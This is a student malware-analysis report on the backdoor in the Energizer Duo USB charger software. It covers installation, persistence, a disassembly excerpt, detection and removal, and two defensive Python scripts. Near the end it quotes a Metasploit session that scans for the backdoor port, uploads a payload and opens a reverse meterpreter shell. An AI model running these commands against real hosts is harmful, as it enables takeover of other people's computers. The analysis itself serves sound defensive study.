This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.
This is a report on the Energizer trojan. The Energizer trojan was discovered in March 2010 in the software suite shipped with the Energizer Duo USB battery charger. The software left a backdoor on the user's computer that enabled an attacker to remotely control the infected system. For this report the trojan was installed in a virtualised system and its effects analysed. A proposal is also put forward as to how this malware may have ended up being shipped as part of a legitimate product.
A trojan is a piece of software that masquerades as legitimate software with a useful purpose but instead damages the user's computer system. The name trojan horse derives from Greek mythology, where a large wooden horse was used by the Greeks to gain access to the city of Troy. Similarly, a trojan program is used to deliver a payload: code that deliberately harms a computer by deleting files, performing denial of service, harvesting passwords and other sensitive information, and so on. The trojan wrapper itself causes no harm; it is the payload it deploys, or the actions of the attacker who uses it, that cause the damage. Trojans are the most common category of malware worldwide; BitDefender, a leading security vendor, stated that they account for "83 percent of the global malware detected in the world". One of the main malicious uses of trojans is in the creation of botnets: large groups of compromised computers that can be used for spamming, phishing and launching denial of service attacks.
The Energizer Trojan
In March 2010 a trojan was discovered in the software suite that accompanied the Energizer Duo USB battery charger. Produced by the Energizer battery company, the product was a simple charger for rechargeable batteries that allowed a user to recharge batteries through the USB port of their computer, with accompanying software to show the user how much charge was in the batteries. The product went on sale around the world in May 2007 with charger software for both Windows and Macintosh computers, but it was not until March 2010 that the backdoor was discovered in the software.
Overview of the Trojan's Deployment
The trojan is only present in the Windows software for the Energizer Duo USB battery charger, and the only way it gets onto a system is when the user runs the accompanying product software; it is not picked up in the wild by visiting tainted websites and the like.
Upon running, the Energizer software suite installs two files onto the user's system: UsbCharger.dll and Arucer.dll. It is Arucer.dll that is the actual trojan. UsbCharger.dll is copied into the application directory, while Arucer.dll is copied into the C:\WINDOWS\system32\ directory. The installer then adds a Windows registry entry so that the trojan is started every time the infected system boots.
The entry is created under the key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. UsbCharger.dll is the library the charger application uses to communicate over the USB interface, and it is this USB communication library that launches Arucer.dll, using the rundll32.exe program.
rundll32.exe is a standard Windows program that loads a Dynamic Link Library into memory and calls an exported function from it. Arucer.dll acts as a backdoor on the user's system, accepting connections over TCP on port 7777. The trojan runs with the privileges of the user who installed it, so on most home Windows systems, where the default user is an administrator, the program has full administrative privileges.
The main capabilities left on the user's system are that an attacker can list the directories on the PC, execute programs, and send and receive files. The ability to upload a file and then execute it is exactly what is needed to make the infected PC part of a botnet and use it to attack other systems and networks.
Performing an analysis of the Trojan
The trojan was deployed in a virtualised environment to perform a thorough analysis of the malware. Since the trojan was reported, it has been covered by a security blog called Skull Security, which includes a step by step breakdown of the malware and the actions it performs on a user's PC. The instructions on that blog were used as a guide to seeing the malware in effect first hand.
Beginning the Analysis
The analysis was run in a VMware virtualised environment so as not to expose the test PC to infection. The operating system was a fresh installation of Windows XP with no anti-virus or anti-spyware installed. WinDbg (the Windows debugging toolkit), the IDA Pro disassembler and debugger, and the Nmap network scanner were downloaded to assist in the investigation and installed on the clean Windows XP image running in the virtual environment. Finally a copy of the infected charger software was downloaded. Before installing it, the command netstat -an was run in the Windows command prompt to determine which ports and network connections were open on the uninfected computer.
Fig1:Uninfected PC before installation of the malware
From the screenshot it can be seen that there are 16 open ports on the PC, among them 123, 135, 137, 138, 139, 445, 500, 1025, 1026, 1030, 1036, 1900 and 4500. Checking the Gibson Research Corporation port database, the function of each of these ports can be determined.
Port 123 is the NTP port, the Network Time Protocol, used by clients to query servers for the time and date. Port 135 is the dcom-scm (epmap) port, the DCOM Service Control Manager and RPC endpoint mapper, which listens for requests from incoming RPC clients.
Port 137 is the netbios-ns port, the NetBIOS Name Service, which answers queries asking a host to disclose its current set of NetBIOS names.
Port 138 is the netbios-dgm port, the NetBIOS Datagram Service, used for exchanging NetBIOS datagrams.
Port 139 is the netbios-ssn port, the NetBIOS Session Service, which carries NetBIOS sessions over TCP; together with 137 and 138 it supports Windows file and printer sharing.
Port 445 is the microsoft-ds port. This carries SMB file sharing directly over TCP and is used by other Windows services.
Port 500 is the isakmp port, the Internet Security Association and Key Management Protocol (ISAKMP). This is used for Internet Key Exchange in IPsec VPNs.
Ports 1025, 1026 and 1030 are dynamically assigned listeners for Windows RPC services; the exact service behind each varies from system to system.
Port 1036 is listed as pcg-radar, the RADAR Service Protocol.
Port 1900 is the ssdp port, the UPnP Simple Service Discovery Protocol, used to send and receive discovery messages from other UPnP devices.
Port 4500 is the ipsec-msft port, Microsoft IPsec NAT-T, used for IPsec communication through NAT.
These ports are standard on any Microsoft Windows system and there is nothing untoward about them. Some of them have known security issues and would be switched off in a hardened installation, but the purpose here is only to establish a baseline of the ports left open in a typical Windows configuration, so that anything the malware adds stands out.
Fig2:Installed Energizer Software on the PC
The infected software was then installed on the virtual system. Immediately after installation the Windows Firewall displayed a Windows Security Alert saying that a program wanted to "Run a DLL as an App" (the description the firewall gives to rundll32.exe). After the alert was allowed, netstat -an was run again in the command prompt to display the open ports. Comparing the list with the baseline, one additional listening port was easy to spot: port 7777. This is the port the malware opens on the PC and on which it accepts commands from the network.
Fig3:Installed software and open port 7777
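As an added example (not part of the original report, and not code from Energizer, Skull Security or Metasploit), the following Python script automates the two host-side checks described above: it parses a baseline and a post-install netstat -an listing and reports any new listening TCP ports, flagging 7777, and it scans the output of reg query on the Run key for a value that starts Arucer.dll through rundll32.exe. The netstat and registry text embedded in the script is constructed sample data; the value name "Arucer" and the exact rundll32 command line are assumptions, only the rundll32 plus Arucer.dll combination comes from the report.

```python
"""Host triage for the Energizer Duo backdoor (added example, not from the
report). Two checks that mirror the manual steps above:
  1. diff the TCP listeners between a baseline `netstat -an` and a
     post-install one, flagging the backdoor's port 7777;
  2. look through the Run key as printed by `reg query` for a value that
     starts Arucer.dll through rundll32.exe.
On a Windows host feed it the real command output; here it runs on
constructed sample text so that it works offline.
"""
import re

BACKDOOR_PORT = 7777  # TCP port Arucer.dll listens on
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Windows XP `netstat -an` prints lines such as:
#   TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
NETSTAT_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s*$", re.I)

# `reg query <key>` prints one value per line (tabs on XP, spaces on later
# Windows):   <name>   REG_SZ   <command line>
REG_VALUE = re.compile(r"^\s*(.+?)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)\s*$")


def listening_ports(netstat_output):
    """Set of TCP ports in LISTENING state in `netstat -an` output."""
    matches = map(NETSTAT_LINE.match, netstat_output.splitlines())
    return {int(m.group(2)) for m in matches if m}


def new_listeners(baseline, after):
    """Ports listening after the install that were absent from the baseline."""
    return listening_ports(after) - listening_ports(baseline)


def suspicious_run_entries(reg_output):
    """(value name, command) pairs under Run that load Arucer.dll via rundll32."""
    hits = []
    for line in reg_output.splitlines():
        m = REG_VALUE.match(line)
        if not m:
            continue
        name, cmd = m.group(1), m.group(2)
        if "rundll32" in cmd.lower() and "arucer.dll" in cmd.lower():
            hits.append((name, cmd))
    return hits


def triage(baseline, after, reg_output):
    """Combine both checks into one verdict dictionary."""
    new_ports = new_listeners(baseline, after)
    entries = suspicious_run_entries(reg_output)
    return {
        "new_ports": sorted(new_ports),
        "backdoor_port_open": BACKDOOR_PORT in new_ports,
        "run_entries": entries,
        "infected": BACKDOOR_PORT in new_ports or bool(entries),
    }


# Constructed sample data, not real captures from the report's VM.
BASELINE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING
  UDP    0.0.0.0:123            *:*
"""
AFTER = BASELINE + "  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING\n"
# Value name "Arucer" and the command line are assumed for illustration.
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    Arucer    REG_SZ    rundll32.exe "C:\WINDOWS\system32\Arucer.dll",Arucer
"""

if __name__ == "__main__":
    print(triage(BASELINE, AFTER, REG_SAMPLE))
```

The registry check deliberately keys on the combination of rundll32 and Arucer.dll rather than on a fixed value name, because the name is the part most likely to differ between versions of the installer; the netstat diff, by contrast, is version independent and is the quickest way to spot the backdoor on a machine whose baseline is known.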
Arucer.dll, the trojan file, is run by the Windows rundll32.exe program.
Using the WinDbg debugging tools it can be confirmed that Arucer.dll is being loaded by rundll32.exe. WinDbg was attached to the rundll32.exe process and a breakpoint set so that execution stops whenever code in Arucer.dll is reached. With the breakpoint in place, connecting to port 7777 with the telnet client triggered the breakpoint inside Arucer.dll as soon as the connection was made.
Fig4:Confirming Arucer.dll called by rundll32.exe
Arucer.dll itself is stored in C:\Windows\System32\. Using the IDA Pro disassembler the code can be disassembled to view the inner workings of the trojan.
Fig4:Arucer.dll trojan disassembled, showing possible programmer's name
The first thing that is apparent is that there appears to be an author's name in the code: "liuhong-061220". In the listing the string is passed to CreateMutexA as the name of a mutex, the usual way a program ensures that only one copy of itself is running. This is very unusual, as most malware is packed or obfuscated and certainly does not carry its author's name in the clear. We can also see the socket the trojan creates and leaves open, in a loop, ready to receive instructions from anyone who can reach the port.
Exploits for the Trojan
The most immediate consequence of the Energizer trojan is that it leaves the user's system open to exploitation by unauthorised parties. The ability to remotely control a system, list its directories, send and receive files and execute programs is a highly desirable backdoor that many attackers would be keen to use for malicious purposes. Because of this, shortly after the trojan became public, scanners and exploits were developed to take advantage of it.
Metasploit is a well known framework of penetration testing tools that can be used to scan for a particular vulnerability and then deliver a payload onto a system. It is an easy to use tool, and even those without considerable knowledge of computer security could use it to take over an infected system. Within hours of the Energizer trojan going public a Metasploit module had been written for it. The framework also gives an attacker numerous pre-built payloads that can be dropped onto an exploited machine with a couple of commands, enabling untold damage to a system with very little effort.
Detecting the Energizer Trojan
An experiment was then run to see whether readily available anti-virus or anti-spyware software would detect the trojan. It had been widely publicised on computer security and technical websites, but it had only been a month since the announcement, so it was interesting to see whether the security software vendors had already picked it up. To test this, AVG Anti-Virus and Spybot Search & Destroy were downloaded and installed on the virtual machine.
After installing the software and running an anti-virus scan of the virtual machine's hard drive, the Arucer.dll trojan was detected.
Fig5:Arucer.dll detected by antivirus
Since the trojan had been so widely publicised, appearing on well known websites such as Slashdot and The Register, it is likely that the anti-virus and anti-spyware vendors added detection for it as soon as details of its existence were published.
Removing the Energizer Trojan
Removing the Energizer trojan was relatively easy for such a dangerous backdoor. First the Energizer battery charger software was uninstalled. Then the file Arucer.dll was deleted from the C:\WINDOWS\system32\ directory. The "Run a DLL as an App" entry was removed from the Windows Firewall exceptions list, so that rundll32.exe is no longer permitted to accept inbound connections. Finally inbound connections to port 7777 were blocked in the firewall, so that nothing could reach the trojan's listener even if it were somehow restarted. One further check worth making is that the value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that started Arucer.dll is gone (the uninstaller should remove it); if it is left behind, rundll32.exe will try to load the now missing DLL at every boot. This returned the system to its original state.
Assessment of the Energizer Trojan
The Energizer trojan is an interesting piece of software. There are several thought-provoking aspects to it.
The Energizer battery company is a reputable company and would not deliberately introduce a backdoor onto its customers' computer systems. The resulting bad publicity was very damaging for the company; it has since stopped selling the product and withdrawn the software download, and has announced an investigation into how the malware ended up in software it was providing to customers. The fact that the Duo USB battery charger had been on sale worldwide since 2007 and the trojan was not discovered until March 2010 means it is probable that a large number of computer systems were compromised and exploited. That for three years the trojan sat on computers across Europe and America without any anti-virus or anti-spyware product detecting it is also worrying.
Another strange thing about the Energizer trojan is that the author of the software appears to have put his name in the code. Authors of malware generally use a handle or nickname if they want recognition for their work, since putting a real name on malware would only invite criminal prosecution. Also, most malware is packed or deliberately obfuscated so that anyone disassembling it will find it difficult to understand its true purpose. The code of the Energizer trojan, however, is clear and easy to read.
Another point is that most malware is exceedingly difficult to remove from a system. It is not uncommon for computer systems suspected of harbouring a backdoor to be wiped and rebuilt rather than cleaned, because the risk of missing something and leaving the system compromised is high. The Energizer trojan, however, can be removed in four simple steps.
These facts seem to indicate that the trojan may not have been deliberately created as malware. One hypothesis is that, in these days of outsourcing, with most manufacturing conducted in China, Energizer contracted a Chinese company to manufacture the Duo USB battery charger and write its software. A USB battery charger's software has no reason to accept connections from the network, and one explanation is that the application was developed from an existing code base, perhaps MP3 player software, with some of the original code's functionality never removed. In any case it was a serious quality control failure on the part of the manufacturer and a real blow to Energizer's reputation.
Energizer is not the only company to have shipped goods contaminated with malware: McDonald's ran a promotion giving away MP3 players that carried spyware, and Seagate shipped Maxtor external hard drives that were also infected. Both products, like the Energizer charger, were built in China. It is not hard to imagine how malware could reach freshly manufactured hardware. Staff in a low-wage manufacturing plant could be bribed or coerced into deploying it, or physical security could be lax enough for outsiders to get at the production line. A more mundane possibility is that the computers used in the plant for testing and validating the assembled hardware are themselves infected, so that new units pick up the malware during the manufacturing process.
A point of note is just how quickly an exploit was developed for the trojan once its existence was made public. As soon as it became widely known that a backdoor was present on every computer running the software, giving an attacker the ability to remotely control the PC, exploitation code became commonly available. Symantec first reported the trojan on 5 March 2010; The Register reported it on 8 March 2010, and that very same day an Nmap script and Metasploit modules were published to search for the trojan and exploit the user's system. It is a good illustration of how quickly attackers move on a known security issue. However, the trojan had existed since 2007. A disturbing alternative scenario is that exploitation code existed well before the publication, and that compromised systems were being remotely accessed by attackers or used for malicious purposes throughout.
What is apparent from the example of the Energizer trojan is just how easily insecure software can end up on a user's PC. A lack of quality control in the manufacture and development of the product, and detachment on the part of Energizer, led to the company shipping software that compromised its users' computers. When a user buys a product they expect the business to exercise a duty of care not to leave their computer open to damage, and the resulting storm of bad publicity across the internet was duly deserved.
Sample Trojan Code
A sample of the trojan code containing the name liuhong-061220. The string is passed to CreateMutexA as the name of a mutex, the usual way a program ensures that only one instance of itself is running; the code then starts a worker thread with CreateThread.
.text:10001040 public Arucer
.text:10001040 Arucer proc near
.text:10001040 call sub_10002610
.text:10001045 test eax, eax
.text:10001047 jz short locret_10001072
.text:10001049 push offset Name ; "liuhong-061220"
.text:1000104E push 0 ; bInitialOwner
.text:10001050 push 0 ; lpMutexAttributes
.text:10001052 call ds:CreateMutexA
.text:10001058 push 0 ; lpThreadId
.text:1000105A push 0 ; dwCreationFlags
.text:1000105C push 0 ; lpParameter
.text:1000105E push offset StartAddress ; lpStartAddress
.text:10001063 push 0 ; dwStackSize
.text:10001065 push 0 ; lpThreadAttributes
.text:10001067 call ds:CreateThread
.text:1000106D call sub_10002910
This is the Metasploit usage for the Energizer trojan modules, taken from the Metasploit website. The first module scans a range of IP addresses for systems with the backdoor listening on port 7777; the second uploads a payload to one of those systems and executes it.
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
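The Metasploit and Nmap modules above are attacker-side tooling; a defender who wants to find infected machines on a network needs the same kind of sweep. The script below is an added example, not code from the report or from Metasploit, and it does not speak Arucer.dll's command protocol (the report does not document it), so it only checks whether something is listening on TCP 7777. A hit is therefore a lead, not proof: confirm it on the host by looking for Arucer.dll in system32 and the rundll32 Run entry. The DummyListener class is a stand-in for an infected host so that the script can be exercised offline; the hosts and port it is run against here are assumptions.

```python
"""Network sweep for hosts with the Energizer Duo backdoor port open
(added example, not from the report). A TCP connect on port 7777 is a
first-pass indicator only: anything listening there will show up, so hits
must be confirmed on the host before being treated as infected.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

BACKDOOR_PORT = 7777  # TCP port Arucer.dll listens on


def port_open(host, port, timeout=1.0):
    """True if a TCP connection to host:port completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, timed out
        return False


def sweep(hosts, port=BACKDOOR_PORT, timeout=1.0, workers=64):
    """Return the subset of hosts (in input order) with the port open."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: port_open(h, port, timeout), hosts))
    return [h for h, up in zip(hosts, results) if up]


class DummyListener:
    """Stand-in for an infected host: a socket that accepts connections the
    way Arucer.dll's listener does. Used only so the sweep can be tried
    offline; the port is chosen by the OS, not 7777, to avoid clashes."""

    def __init__(self, host="127.0.0.1"):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((host, 0))  # port 0: let the OS pick a free port
        self.sock.listen(8)
        self.sock.settimeout(0.2)  # poll so stop() can end the loop cleanly
        self.port = self.sock.getsockname()[1]
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:  # socket closed underneath us
                return
            conn.close()

    def stop(self):
        """Stop the accept loop, then close the socket so the port is freed."""
        self._stop.set()
        self._thread.join()
        self.sock.close()


if __name__ == "__main__":
    # Assumed demo targets: a local dummy "infected" host and a loopback
    # address with nothing listening on that port.
    listener = DummyListener()
    print("hits:", sweep(["127.0.0.1", "127.0.0.2"], listener.port))
    listener.stop()
```

In production use, feed sweep() the address list for the subnet concerned (the Metasploit run above used 192.168.0.0/24) and keep the timeout short; the thread pool makes a /24 sweep take a few seconds rather than the minutes a serial connect loop would need.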